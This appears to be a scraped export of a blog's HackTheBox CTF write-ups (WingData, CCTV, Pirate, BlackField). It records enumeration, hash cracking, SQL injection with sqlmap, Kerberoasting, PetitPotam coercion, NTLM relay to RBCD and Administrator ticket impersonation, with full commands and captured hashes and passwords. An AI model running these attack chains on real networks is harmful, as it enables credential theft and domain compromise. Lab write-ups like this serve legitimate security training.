\u0026lt;Password\u0026gt;a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba\u0026lt;/Password\u0026gt; \u0026lt;Type\u0026gt;0\u0026lt;/Type\u0026gt; \u0026lt;Readonly\u0026gt;0\u0026lt;/Readonly\u0026gt; ServerPassword\u0026gt;2D35A8D420A697203D7C554A678F8119\u0026lt;/ServerPassword\u0026gt; lets check this out\nhttps://www.hooperlabs.xyz/disclosures/cve-2020-9470.php\nhmm lets see if we grab anything interesting from linpeas output\n/opt/wftpserver/Data/1/groups /opt/wftpserver/Data/1/portlistener.xml /opt/wftpserver/Data/1/settings.xml /opt/wftpserver/Data/1/users /opt/wftpserver/Data/1/users/anonymous.xml /opt/wftpserver/Data/1/users/john.xml /opt/wftpserver/Data/1/users/maria.xml /opt/wftpserver/Data/1/users/steve.xml **/opt/wftpserver/Data/1/users/wacky.xml --\u0026gt; wacky is another user on this machine opt/wftpserver/Log/Admin /opt/wftpserver/Log/Admin/Admin-2025-11-2.log /opt/wftpserver/Log/Admin/Admin-2025-11-3.log /opt/wftpserver/Log/Admin/Admin-2026-1-12.log /opt/wftpserver/Log/Admin/Admin-2026-1-14.log /opt/wftpserver/Log/Admin/Admin-2026-1-20.log /opt/wftpserver/Log/Domains/1/2026-3-9.log /opt/wftpserver/Log/Domains/1/2026-2-9.log.zip /opt/wftpserver/Log/System/System-2026-2-9.log /opt/wftpserver/Log/System/System-2026-3-9.log /tmp/linpeas.sh** anony: d67f86152e5c4df1b0ac4a18d3ca4a89c1b12e6b748ed71d01aeb92341927bca john: c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10 maria: a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03 steve: 5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca wacky: 32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca on cracking the hash with WingFTP as the salt\n!#7Blushing^*Bride5\nwe get this as the password\nPassword \u0026amp; Security\u0026quot; settings to harden the hashing process. Variable Salt (%Name): The system allows the use of the variable %Name as a salt, which dynamically replaces the salt with the specific username for each user. Default Salt Behavior: In some contexts, particularly for administrative users, a default salt (e.g., \u0026ldquo;WingFTP\u0026rdquo;) may be used, resulting in hashes like SHA256(Password+\u0026ldquo;WingFTP\u0026rdquo;). Storage: The hashed passwords (often SHA-256) are typically stored in XML configuration files.\nlets get a ssh shell now\n#!/usr/bin/env python3 import tarfile import os import sys import re import argparse BACKUP_BASE_DIR = \u0026#34;/opt/backup_clients/backups\u0026#34; STAGING_BASE = \u0026#34;/opt/backup_clients/restored_backups\u0026#34; def validate_backup_name(filename): if not re.fullmatch(r\u0026#34;^backup_\\d+\\.tar$\u0026#34;, filename): return False client_id = filename.split(\u0026#39;_\u0026#39;)[1].rstrip(\u0026#39;.tar\u0026#39;) return client_id.isdigit() and client_id != \u0026#34;0\u0026#34; def validate_restore_tag(tag): return bool(re.fullmatch(r\u0026#34;^[a-zA-Z0-9_]{1,24}$\u0026#34;, tag)) def main(): parser = argparse.ArgumentParser( description=\u0026#34;Restore client configuration from a validated backup tarball.\u0026#34;, epilog=\u0026#34;Example: sudo %(prog)s -b backup_1001.tar -r restore_john\u0026#34; ) parser.add_argument( \u0026#34;-b\u0026#34;, \u0026#34;--backup\u0026#34;, required=True, help=\u0026#34;Backup filename (must be in /home/wacky/backup_clients/ and match backup_\u0026lt;client_id\u0026gt;.tar, \u0026#34; \u0026#34;where \u0026lt;client_id\u0026gt; is a positive integer, e.g., backup_1001.tar)\u0026#34; ) parser.add_argument( \u0026#34;-r\u0026#34;, \u0026#34;--restore-dir\u0026#34;, required=True, help=\u0026#34;Staging directory name for the restore operation. \u0026#34; \u0026#34;Must follow the format: restore_\u0026lt;client_user\u0026gt; (e.g., restore_john). \u0026#34; \u0026#34;Only alphanumeric characters and underscores are allowed in the \u0026lt;client_user\u0026gt; part (1–24 characters).\u0026#34; ) args = parser.parse_args() if not validate_backup_name(args.backup): print(\u0026#34;[!] Invalid backup name. Expected format: backup_\u0026lt;client_id\u0026gt;.tar (e.g., backup_1001.tar)\u0026#34;, file=sys.stderr) sys.exit(1) backup_path = os.path.join(BACKUP_BASE_DIR, args.backup) if not os.path.isfile(backup_path): print(f\u0026#34;[!] Backup file not found: {backup_path}\u0026#34;, file=sys.stderr) sys.exit(1) if not args.restore_dir.startswith(\u0026#34;restore_\u0026#34;): print(\u0026#34;[!] --restore-dir must start with \u0026#39;restore_\u0026#39;\u0026#34;, file=sys.stderr) sys.exit(1) tag = args.restore_dir[8:] if not tag: print(\u0026#34;[!] --restore-dir must include a non-empty tag after \u0026#39;restore_\u0026#39;\u0026#34;, file=sys.stderr) sys.exit(1) if not validate_restore_tag(tag): print(\u0026#34;[!] Restore tag must be 1–24 characters long and contain only letters, digits, or underscores\u0026#34;, file=sys.stderr) sys.exit(1) staging_dir = os.path.join(STAGING_BASE, args.restore_dir) print(f\u0026#34;[+] Backup: {args.backup}\u0026#34;) print(f\u0026#34;[+] Staging directory: {staging_dir}\u0026#34;) os.makedirs(staging_dir, exist_ok=True) try: with tarfile.open(backup_path, \u0026#34;r\u0026#34;) as tar: tar.extractall(path=staging_dir, filter=\u0026#34;data\u0026#34;) print(f\u0026#34;[+] Extraction completed in {staging_dir}\u0026#34;) except (tarfile.TarError, OSError, Exception) as e: print(f\u0026#34;[!] Error during extraction: {e}\u0026#34;, file=sys.stderr) sys.exit(2) if __name__ == \u0026#34;__main__\u0026#34;: main() https://github.com/AzureADTrent/CVE-2025-4517-POC-HTB-WingData\n","date":"9 March 2026","externalUrl":null,"permalink":"/ctf-writeups/wingdata/","section":"CTF Writeups","summary":"","title":"WingData","type":"ctf-writeups"},{"content":" CCTV # Overview # OS: Linux IP: 10.129.3.60 Difficulty: Easy Platform: HackTheBox OSCP: No Lists: N/A Summary # timebased sqli gave ssh creds, anbd then rce via public exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # └─$ nmap cctv.htb -sU --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 08:05 EDT Nmap scan report for cctv.htb (10.129.3.60) Host is up (0.12s latency). Not shown: 994 open|filtered udp ports (no-response) PORT STATE SERVICE 1066/udp closed fpo-fns 9370/udp closed unknown 16545/udp closed unknown 17332/udp closed unknown 21320/udp closed unknown 34758/udp closed unknown nmap cctv.htb -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 08:05 EDT Warning: 10.129.3.60 giving up on port because retransmission cap hit (10). Nmap scan report for cctv.htb (10.129.3.60) Host is up (0.12s latency). Not shown: 62846 closed tcp ports (reset), 2687 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |_ 256 76:1d:73:98:fa:05:f7:0b:04:c2:3b:c4:7d:e6:db:4a (ECDSA) 80/tcp open http Apache httpd 2.4.58 |_http-title: SecureVision CCTV \u0026amp; Security Solutions Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: Host: default; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 115.60 ms 10.10.14.1 2 116.15 ms cctv.htb (10.129.3.60) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 82.54 seconds Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nthe login page takes us here\nsuprising a simple admin:admin gets us in\nExploitation # visting this forum\nhttps://forums.zoneminder.com/viewtopic.php?t=1029\ntells us the db structure so we are able to enumerate more efficiently now\nsqlmap -u \u0026#34;http://cctv.htb/zm/index.php?view=request\u0026amp;request=event\u0026amp;action=removetag\u0026amp;tid=1\u0026#34; \\ --cookie=\u0026#34;ZMSESSID=6lkqf49jhdfdo1l4nplp9m9o5\u0026#34; \\ -D zm -T Users -C Username,Password \\ --where=\u0026#34;Username=\u0026#39;mark\u0026#39;\u0026#34; \\ --dump --threads 10 --batch and the password we get is opensesame\na bunch of ports running here\nseems to be running motion 4.7.1\ngrep -R \u0026#34;7999\\|8888\\|8765\\|9081\\|8554\\|1935\u0026#34; /etc 2\u0026gt;/dev/null grep -R \u0026#34;3306\\|mysql\u0026#34; /etc 2\u0026gt;/dev/null and we have motioneye lets check its config and portforward the webportal\nwe have admin username as admin\nand password\n989c5a8ee87a0e9521ec81a79187d162109282f0\nlets follow this now\nafter bypassing client side verif in the console we can\nand this should give us our reverse shell\n","date":"8 March 2026","externalUrl":null,"permalink":"/ctf-writeups/cctv/","section":"CTF Writeups","summary":"","title":"CCTV","type":"ctf-writeups"},{"content":" Pirate # Overview # OS: Windows AD IP: 10.129.3.153 Difficulty: Hard Platform: HackTheBox OSCP: No Lists: N/A Summary # season.\nLoot # Loot Category Details Usernames pentest Passwords p3nt3st2025!\u0026amp; Usernames+Passwords pentest / p3nt3st2025!\u0026amp; Hashes Service Versions Enumeration # As is common in real life pentests, you will start the Pirate box with credentials for the following account pentest / p3nt3st2025!\u0026amp;\nNmap # ─$ nmap 10.129.3.153 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-08 15:07 EDT Nmap scan report for 10.129.3.153 Host is up (0.11s latency). Not shown: 65512 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus **80/tcp open http Microsoft IIS httpd 10.0** | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-09 02:08:20Z) **135/tcp open msrpc Microsoft Windows RPC** 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb **| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb** | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:01+00:00; +7h00m00s from scanner time. 443/tcp open https? 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: **pirate.htb0**., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:02+00:00; +7h00m00s from scanner time. 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 |_ssl-date: 2026-03-09T02:10:01+00:00; +7h00m00s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: pirate.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-09T02:10:02+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: commonName=DC01.pirate.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:\u0026lt;unsupported\u0026gt;, DNS:DC01.pirate.htb | Not valid before: 2025-06-09T14:05:15 |_Not valid after: 2026-06-09T14:05:15 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found **9389/tcp open mc-nmf .NET Message Framing** 49667/tcp open msrpc Microsoft Windows RPC 49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49686/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49689/tcp open msrpc Microsoft Windows RPC 49914/tcp open msrpc Microsoft Windows RPC 51252/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2026-03-09T02:09:22 |_ start_date: N/A TRACEROUTE (using port 139/tcp) HOP RTT ADDRESS 1 110.11 ms 10.10.14.1 2 110.45 ms 10.129.3.153 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 127.25 seconds SMB # there seems to be no pass reuse rn\nno winrm either as pirate\nRoasting # kerberorast\n*] sAMAccountName: a.white_adm, memberOf: CN=IT,CN=Users,DC=pirate,DC=htb, pwdLastSet: 2026-01-15 19:36:34.388000, lastLogon: 2025-06-09 12:03:37.380258 LDAP 10.129.3.153 389 DC01 $krb5tgs$23$*a.white_adm$PIRATE.HTB$pirate.htb\\a.white_adm*$b62e426cdc4343942624834383c86190$5946b95656c2b32fd785eeadfb410a77e8992b6bbcf07326fe717d92364a826cc2de118ad1b00489d2df2a4e351d99a4734801807bb7bc9699a7dd2dbf82e9b412c5daa5ec8f6effbbb2b9e2780efcc73082bc326ca62018cd0fe522164d5e1a42c86ddf3cbbe5b172f820ff81e42c6e891baea91b08c6699cdec13202b75e8822c706f2eb40b16f0c542236be8cee789fa0529e52bc403dfd4ff20d44b335347e9ff95d948af65a10d9e75c5b60236fc5a39c9d06f842c5049d524d73745c96a96130b85b8bf7586b45c60f7845a7c13dd28a07e64e1566d8ad4e26c0213695157783b8b6a31888c2f035dc3809a613a9b09d4cd0cfc3bf0a076b3b6cb4de0f7ae31b5713314f462aaa71fd1303dc9fc78335292c9ff6de47a2cc11d700113b2d8de8875ccc2e6974360ff8060ad80cd5ac8b60823554ac1c6d7fcb9d2c93b04293698786dab0836459d15de2c26f7a948f3be3198b45474b1babafca3302a0931298a16c9f9753bfc276b9c83619669da4cf3ac0051de9e338f9226cba0c754bbc049ccaeeb5db3ac4ad200485a7842935fa68a4b5850ed660d2e95ea966f170ddaf0369d88f551f8b909bad590d6aca47b6d8f3b4328ae358d870fa4617b69f1642b70cfdf0857deb7d381f16f51f1a04539acb216b9bf13ae58a563c55b6bcb1410c8939768dbe3e929799a0df21a19b4b2c9cc32a0b01725145a1b97738cdd68e05410601aac670ce0f5dc68ab99ea4e84a2488662f612ed5921477756f8efbbe257ab7d8c4e0c61a1485a74630f8bd0f011432e5c5789a35c333913b1c0466e14848a1965e46d33fb5763f14ccf93b4f3eb9b2b232e0aadbd9b59e095007b689ed0228545090721c8312b719e5103b23e63ac73e67b084381df6543f7b0badcaea4de68a5f2a4839b036d201ea87d3cc6740eaa02af42c5c388526979377526b82de8a41f409528d8daf898221915c6be8704e8953726767ae24bbca66e4341e663a38a7e49306b7587bc24476aa3a26cbfae7ef9e7af7777a51a14c96cb0780b1bca4625f3054e3b6d3693a2a4031aa506f46d17b97f150860d1d79ec41ad9197bdc2b6d14e6841e6d7c7433578536b19f54c8e192d9e12086eb0d9cb5ace729c901eb86ff68a3546c4270acdbaa0312e86c3de728d637ffee759b91a836b33e6cf4753f4ce3029bbe7761361d679630077eb4869bd60644d3e8b2b527d645a070990b972cd53e5f8b48161ff2c1863f25049473ccb49a224f6c26cb8e08ad97758be258f5452137b5c14408082d4c558dd465b726a3eb25c7a5861f0daa10ab97fe5d8bf1cb7c7548a7c1b3b0563bdec1360869979c83c1694b114402f7669bd8e7f0fb25c9f3afd7289d6d9bdd49913b1e3fd0a8075d8c43745ec26b294fddcb7dead6d4cb5610b05cfc0f7315b53c543e1afe9cd2afefb32ad856ae9dd5de0ae954c9e5a1d LDAP 10.129.3.153 389 DC01 [*] sAMAccountName: gMSA_ADFS_prod$, memberOf: CN=Remote Management Users,CN=Builtin,DC=pirate,DC=htb, pwdLastSet: 2025-06-09 10:48:41.108220, lastLogon: 2026-03-08 22:07:52.081087 LDAP 10.129.3.153 389 DC01 $krb5tgs$18$gMSA_ADFS_prod$$PIRATE.HTB$*pirate.htb\\gMSA_ADFS_prod$*$ee63da1c6b849c412012a42d$5acd4e383bddfdf2032c2315a35ff69e8e04830f366001cee3a7df762f50bd0557c5f926f959163a4cb50437d1e23e359364aecf0821ae93944549ca9f47457926884677a39682fe67c530c71b9dc764ec874672b9d27ed22f7fbb14912949196a9880bdd57388112df3238c4106e200493d5ec2ba5a7296bb32c264aec8a34dca2cd7a73ed506691576a3efc2953aebdd4f337109b453e1d6ff354f9661d5c53cd49355b913bd5144ccebd98bb21336ee6f3f690b427e62af41abbc4378be0dd21a55ca9638e178927c1ce6530d343e280dca5ad35978ae7279592bdb674fc487e3eb02d966137265d5b4e62b27768a71e6348c60ea950adb8302298e768b3541301d1983398e95570371db0b56614003c38e711510c64ed2cfdc110c713ebbef590de816fa0342dbff1c9db508240e61ee96af415f758ff36989fc0924d7062a7fc0a5c18da57efb4b10f9c04ab4536fc5198f4c3613ea7e6d2ca5d9f02f3d92fb4e0287472effa8ceea47150b955232c54b7064d964f1eb19652189a88f0982fc9012ce304e1882b035781687f29115cbf345cb75c92262be1df73dbf5bca3c115eb110dcbb005badad6063f071e5e8f68ad72fbd82c0fb871e98ca1fc0d51a40caba95e369297fa2e842e3cdad5acfe9cb6febb82ab28690f4ad0c545d900ab2e15b64d37f31e044f55fd7957e5c341bea2f7fc0101c3c7331d6e9a6e67e3767eb2aa233a40cb6b1ef8d05d8586cea310e246607cebbe91ab36acd23a80124e79a42e4461ab318f0cae3d2b9e924f306e631528204b87e742616da8de373a795579d7f435aa68952228e476c1f70eb66307bb331a944a0c687537d0b9039a98798fe4137082d409ae4fcbbe18b319d5bef7e58edb8d2e5f03270339269af58ccfd993ae6b02b41f0fe4bf85c8ffd691fb992de072db99a81e9c85df84608199a78f921be1c54bdd3e3ba3948ef378c94273987c00543b344b5ce2be4036ff1a50ec90a94638e3bec8016941751d07b0358cd541d0d2e2488f34de0253830ac8e1771cb6fa950efde0e71053704f8e2ccee9579294e2cb39ecab00855c77c8cd1a91169ac5e58e81a323f874474e069f1e813330c6a999fe1883a24fd4ffaaefc10a2d317eca0b497a212acf0692aa9c85dc6e1392ff585c3df26834641d72ab3d9db391a5b6fdd9481b423b62ff1515dd1c521809c8e1ed33ce86ebb54966db9b1f68c8b754bdfe2cbd512875ff7ef97a1eaa35967c33e634c95ca12c5982a9f0a3f733d014be5640df36a5252c9026e6c2608d3d1338645eb70c1d4b9c6834d06b9d446f4c3114ded404ef7a0091a9e6b9e2803b98f06f93dfa9767c2d0737fcc4e39c62bae16c0b58ac2e56b8423229ac242b87958cbd3524c74e233b2a299630f75eba517a2b25dca609062117b0458fa909235907cffa126d26d808b530ec52059d44ae9b439 on kerberoasting we got the hash of gMSA_ADFS$ machine acc thats part of rem,ote management users and a.white_adm a service account thats part of the IT group\nlets crack the password\nasreproast\nnothing while cracking either, and boodhound fails bothways with nxc and python so lets try apache studio nd see if there is anything\nDirbusting # Port 80 # Exploitation # On further enumeration of groups\nMATCH (g:Group) RETURN g we come across this pre window 2k group\non searching online apparently sometimes prewin2k machine accs have the same pass as thier spn but in lowercase\nlets try getting in as MS01 and reading the gms pass\nMS01$ / ms01\nWindows Pre2k # pass is same lowercase without $\nKerberos does allow machine accounts, so it successfully issued a TGT and saved:\ngrab ticket\n└─$ impacket-getTGT pirate.htb/MS01$:ms01 -dc-ip 10.129.3.153 export KRB5CCNAME=MS01$.ccache bloodyAD --host DC01.pirate.htb -d pirate.htb -u MS01$ -k get object \u0026#34;gMSA_ADFS_prod$\u0026#34; --attr msDS-ManagedPassword and boom we should have the ntlm hash for gMSA_ADFS_prod$\naad3b435b51404eeaad3b435b51404ee:fd9ea7ac7820dba5155bd6ed2d850c09 lets add to owned in bh\nthere is an internal network 192.168.100.1\nPivot # lets setup ligolo\nnow we can scan that network\nfor i in {1..254}; do (ping -c 1 192.168.1.$i | grep \u0026#34;bytes from\u0026#34; \u0026amp;); done nmap -A nslookup WEB01.pirate.htb 10.129.3.153 WEB-01 # nsllookup gives us the ip as 192.168.100.2\nnow that we have access to this machines network lets try that ntlm relay and coerce this machine into connecting to us\npython3 PetitPotam.py -u \u0026#39;pentest\u0026#39; -p \u0026#39;p3nt3st\u0026#39; -d pirate.htb 10.10.14.82 192.168.100.2 and boom we got ourselves in\nisoned. [SMB] NTLMv1-SSP Client : 10.129.3.153 [SMB] NTLMv1-SSP Username : PIRATE\\WEB01$ [SMB] NTLMv1-SSP Hash : WEB01$::PIRATE:85B423B8FFA6B86300000000000000000000000000000000:1BA6BDB65B8434C7578893E959DE85AAE415A59B3579479B:b66c2c62a5c339cc [SMB] NTLMv2-SSP Client : 10.129.3.153 [SMB] NTLMv2-SSP Username : PIRATE\\DC01$ [SMB] NTLMv2-SSP Hash : DC01$::PIRATE:4a48f82be880c97b:D38E9DF3D9775776F36798081094AB4B:01010000000000008055B2AAF3AFDC014B6E17679A128E2600000000020008005A0053005500530001001E00570049004E002D005800340054005A00590048005500530051003400530004003400570049004E002D005800340054005A0059004800550053005100340053002E005A005300550053002E004C004F00430041004C00030014005A005300550053002E004C004F00430041004C00050014005A005300550053002E004C004F00430041004C00070008008055B2AAF3AFDC010600040002000000080030003000000000000000000000000040000055A23157DBADBE4EE57F5D7BBED5DD36A742662C905A06D6B35DD9DCEB9C472A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00380032000000000000000000 ukw lets just go the route with ntlmrelay because that will help us do the rbcd easier\nsudo impacket-ntlmrelayx -t ldaps://10.129.5.228 --delegate-access -smb2support --remove-mic and now\npython3 PetitPotam.py -u \u0026#39;pentest\u0026#39; -p \u0026#39;p3nt3st2025!\u0026amp;\u0026#39; -d pirate.htb 10.10.14.82 192.168.100.2 rgets left! [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Attempting to create computer in: CN=Computers,DC=pirate,DC=htb [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Adding new computer with username: ECEGKABB$ and password: p0\u0026gt;pbp$iwJ##ah^ result: OK [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; Delegation rights modified succesfully! [*] ldaps://PIRATE/WEB01$@pirate.htb [1] -\u0026gt; ECEGKABB$ can now impersonate users on WEB01$ via S4U2Proxy so we have a computer now with\nECEGKABB$ and password: p0\u0026gt;pbp$iwJ##ah^\nnow lets get the Admin ticket for WEB01\n─$ impacket-getST \u0026#39;pirate.htb/ECEGKABB$:p0\u0026gt;pbp$iwJ##ah^\u0026#39; \\ -spn cifs/WEB01.pirate.htb \\ -impersonate Administrator \\ -dc-ip 10.129.3.153 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] Getting TGT for user [*] Impersonating Administrator [*] Requesting S4U2self [*] Requesting S4U2Proxy [*] Saving ticket in Administrator@cifs_WEB01.pirate.htb@PIRATE.HTB.ccache ","date":"8 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pirate/","section":"CTF Writeups","summary":"","title":"Pirate","type":"ctf-writeups"},{"content":" BlackField # Overview # OS: Windows IP: 10.129.1.58 Difficulty: Hard Platform: HackTheBox OSCP: Yes Lists: N/A Summary # found users thru rid brute with guest access, aseproasted found creds, force changed creds for audit aco access forensics share, dumped lsass found creds for service accouint, winrm as servcice and dumped ntds system and sam, found creds for Administrator.\nLoot # Loot Category Details Usernames support Passwords #00^BlackKnight Usernames+Passwords support: #00^BlackKnight audit2020:Password@123 | | Hashes | | | Service Versions | |\nEnumeration # Nmap # Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-06 07:55 EST Nmap scan report for 10.129.1.58 Host is up (0.11s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain (generic dns response: SERVFAIL) | fingerprint-strings: | DNS-SD-TCP: | _services | _dns-sd | _udp |_ local 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-06 19:56:06Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) **5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)** |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port53-TCP:V=7.95%I=7%D=3/6%Time=69AACEF5%P=x86_64-pc-linux-gnu%r(DNS-S SF:D-TCP,30,\u0026#34;\\0\\.\\0\\0\\x80\\x82\\0\\x01\\0\\0\\0\\0\\0\\0\\t_services\\x07_dns-sd\\x04_ SF:udp\\x05local\\0\\0\\x0c\\0\\x01\u0026#34;); Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (90%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 6h59m58s | smb2-time: | date: 2026-03-06T19:56:35 |_ start_date: N/A TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 112.72 ms 10.10.14.1 2 112.80 ms 10.129.1.58 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.87 seconds Dirbusting # nothing interesting AT ALL Port 80 # Nothing\nno subdomains either w wfuzz\nSMB # We have guest access lets try bruteforcing the RID\nnetexec smb blackfield.local -u \u0026#39;guest\u0026#39; -p \u0026#39;\u0026#39; --rid-brute | grep \u0026#34;SidTypeUser\u0026#34; | awk -F\u0026#39;\\\\\u0026#39; \u0026#39;{print $2}\u0026#39; | awk \u0026#39;{print $1}\u0026#39; \u0026gt; users.txt Administrator Guest krbtgt DC01$ audit2020 support BLACKFIELD764430 BLACKFIELD538365 BLACKFIELD189208 BLACKFIELD404458 BLACKFIELD706381 BLACKFIELD937395 BLACKFIELD553715 BLACKFIELD840481 BLACKFIELD622501 BLACKFIELD787464 BLACKFIELD163183 BLACKFIELD869335 BLACKFIELD319016 BLACKFIELD600999 BLACKFIELD894905 BLACKFIELD253541 BLACKFIELD175204 BLACKFIELD727512 BLACKFIELD227380 BLACKFIELD251003 BLACKFIELD129328 BLACKFIELD616527 BLACKFIELD533551 BLACKFIELD883784 BLACKFIELD908329 BLACKFIELD601590 BLACKFIELD573498 BLACKFIELD290325 BLACKFIELD775986 BLACKFIELD348433 BLACKFIELD196444 BLACKFIELD137694 BLACKFIELD533886 BLACKFIELD268320 BLACKFIELD909590 BLACKFIELD136813 BLACKFIELD358090 BLACKFIELD561870 BLACKFIELD269538 BLACKFIELD169035 BLACKFIELD118321 BLACKFIELD592556 BLACKFIELD618519 BLACKFIELD329802 BLACKFIELD753480 BLACKFIELD837541 BLACKFIELD186980 BLACKFIELD419600 BLACKFIELD220786 BLACKFIELD767820 BLACKFIELD549571 BLACKFIELD411740 BLACKFIELD768095 BLACKFIELD835725 BLACKFIELD251977 BLACKFIELD430864 BLACKFIELD413242 BLACKFIELD464763 BLACKFIELD266096 BLACKFIELD334058 BLACKFIELD404213 BLACKFIELD219324 BLACKFIELD412798 BLACKFIELD441593 BLACKFIELD606328 BLACKFIELD796301 BLACKFIELD415829 BLACKFIELD820995 BLACKFIELD695166 BLACKFIELD759042 BLACKFIELD607290 BLACKFIELD229506 BLACKFIELD256791 BLACKFIELD997545 BLACKFIELD114762 BLACKFIELD321206 BLACKFIELD195757 BLACKFIELD877328 BLACKFIELD446463 BLACKFIELD579980 BLACKFIELD775126 BLACKFIELD429587 BLACKFIELD534956 BLACKFIELD315276 BLACKFIELD995218 BLACKFIELD843883 BLACKFIELD876916 BLACKFIELD382769 BLACKFIELD194732 BLACKFIELD191416 BLACKFIELD932709 BLACKFIELD546640 BLACKFIELD569313 BLACKFIELD744790 BLACKFIELD739659 BLACKFIELD926559 BLACKFIELD969352 BLACKFIELD253047 BLACKFIELD899433 BLACKFIELD606964 BLACKFIELD385719 BLACKFIELD838710 BLACKFIELD608914 